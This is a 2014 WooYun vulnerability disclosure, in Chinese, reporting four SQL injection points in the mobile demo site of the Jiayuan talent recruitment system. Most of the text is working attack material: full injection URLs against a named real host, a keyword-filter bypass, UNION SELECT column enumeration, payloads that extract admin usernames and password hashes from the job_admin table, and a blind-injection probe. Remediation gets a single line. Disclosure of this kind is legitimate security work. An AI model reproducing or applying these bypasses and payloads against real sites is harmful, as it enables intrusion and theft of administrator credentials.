当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083896

漏洞标题:嘉缘人才系统4处SQL注入#2(demo测试)

相关厂商:finereason.com

漏洞作者: 龟兔赛跑

提交时间:2014-11-21 17:22

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-01-20: 细节向核心白帽子及相关领域专家公开
2015-01-30: 细节向普通白帽子公开
2015-02-09: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

嘉缘人才系统4处SQL注入。
官网demo测试。

详细说明:

嘉缘人才系统触屏版http://m.rccms.com。
第一处:

http://m.rccms.com/co/company.php?id=1065


1.png


修改参数为id=1065 and,出现SQL错误。

http://m.rccms.com/co/company.php?id=1065%20and


2.png


修改参数为id=1065 and 1=1, 信息又出来了,基本可以确定这里存在SQL注入。

3.png


嘉缘人才系统对SQL会check是否存在union/select等,union的话1.union就可以然过,select的话,在前面加一个@`'`,最后加一个#'就可以绕过,所以构造SQL如下:

id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1%23'


这个会报SQL错误,因为表的列数不对,然后我们继续

id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4,5%23'


一直到没有SQL错误能正常输出,参数为:

id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27


4.png


好了,我们替换上面的63为导出管理员表的数据的select:

(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin))


完整的参数为:

1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27


好了,数据显示出来了。

http://m.rccms.com/co/company.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27


5.png


第二处:

http://m.rccms.com/co/hire.php?id=1


http://m.rccms.com/co/hire.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144%0alimit%0a1%23%27


hire.png


第三处:

http://m.rccms.com/co/hires.php?id=2


2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27


http://m.rccms.com/co/hires.php?id=2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27


hires.png


第四处:

http://m.rccms.com/co/map.php?id=2


id参数可以盲注。

http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x63)


返回正常页面,

map.png


http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x64)


返回参数错误

漏洞证明:

5.png


hire.png


hires.png


map.png


修复方案:

过滤参数id。

版权声明:转载请注明来源 龟兔赛跑@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

最新状态:

暂无